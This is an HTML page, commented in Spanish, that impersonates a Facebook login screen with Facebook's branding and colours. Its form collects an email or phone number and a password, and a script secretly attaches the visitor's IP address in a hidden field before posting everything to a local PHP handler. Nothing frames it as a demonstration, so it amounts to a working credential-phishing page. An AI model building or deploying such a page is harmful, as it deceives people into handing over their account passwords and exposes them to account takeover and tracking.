<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar Sesión en Facebook</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f0f2f5;
        }

        .container {
            max-width: 400px;
            margin: 50px auto;
            padding: 20px;
            background-color: #ffffff;
            border-radius: 8px;
            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
        }

        h1 {
            text-align: center;
            color: #1877f2;
        }

        label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
        }

        input[type="text"],
        input[type="password"],
        button {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
            font-size: 16px;
        }

        button {
            background-color: #1877f2;
            color: #ffffff;
            font-weight: bold;
            cursor: pointer;
        }

        button:hover {
            background-color: #0e63ae;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Iniciar Sesión en Facebook</h1>
        <form id="loginForm" action="procesar_formulario.php" method="post">
            <label for="username">Correo electrónico o teléfono:</label>
            <input type="text" id="username" name="username" required>
            <label for="password">Contraseña:</label>
            <input type="password" id="password" name="password" required>
            <button type="submit">Iniciar Sesión</button>
        </form>
    </div>

    <script>
        document.getElementById('loginForm').addEventListener('submit', function(event) {
            event.preventDefault(); // Evitar que el formulario se envíe

            var username = document.getElementById('username').value;
            var password = document.getElementById('password').value;
            var ip = "<?php echo $_SERVER['REMOTE_ADDR']; ?>"; // Obtener la IP del usuario en JavaScript

            // Agregar la IP al formulario antes de enviarlo
            var form = document.getElementById('loginForm');
            var ipField = document.createElement('input');
            ipField.type = 'hidden';
            ipField.name = 'ip';
            ipField.value = ip;
            form.appendChild(ipField);

            // Ahora puedes enviar el formulario con la IP incluida
            form.submit();
        });
    </script>
</body>
</html>
